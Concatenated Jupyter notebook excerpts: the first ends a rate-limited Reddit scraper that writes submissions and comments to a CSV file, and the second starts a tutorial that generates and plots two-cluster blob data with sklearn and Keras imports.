sleep(4)
# this formats all the submissions so it is easy to read
format = '*' + eachtopic + '* "'
format += submission.title + '", written by '
format += submission.author.name + '. @ '
format += datetime.strftime(datetime.fromtimestamp(submission.created_utc), ' %A, %B %d, %Y') + '.\n'
# add everything we formatted to the subfile
subfile.write(format)
# making sure that it pulls all the comments from reddit by bypassing the "more" button
submission.comments.replace_more(limit=None)
commentlist = submission.comments.list()
sleep(4)
# opening the file again to add/append the found comments to list
with open("moduleone_missionhamburgler.csv", 'a') as subfile:
# same as what I did for the submissions.
for eachcomment in commentlist:
sleep(2)
format = str(eachcomment) + ','
format += eachcomment.body.replace('\n', '/') + ','
format += submission.author.name + ','
format += datetime.strftime(datetime.fromtimestamp(submission.created_utc), ' %A, %B %d, %Y') + ','
subfile.write(format)
###Output
_____no_output_____ |
sklearn.datasets_create_two_datasets_blobs.ipynb | ###Markdown
import everything
###Code
import matplotlib
import matplotlib.pyplot as plt
import numpy as np
from keras.models import Sequential
from keras.layers import Dense
from sklearn.datasets import make_blobs
%matplotlib inline
matplotlib.rcParams['figure.figsize'] = (10.0, 8.0)
#data, label = make_moons(n_samples=500, noise=0.2, random_state=0)
#label = label.reshape(500, 1)
data, label = make_blobs(n_samples=500, centers=2)
print('data shape :', data.shape)
print(data[:5], '\n')
print('label shape:', label.shape)
print(label[:5])
# draw picture
plt.scatter(data[:,0], data[:,1], s=40, c=label, cmap=plt.cm.Accent)
###Output
_____no_output_____ |
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.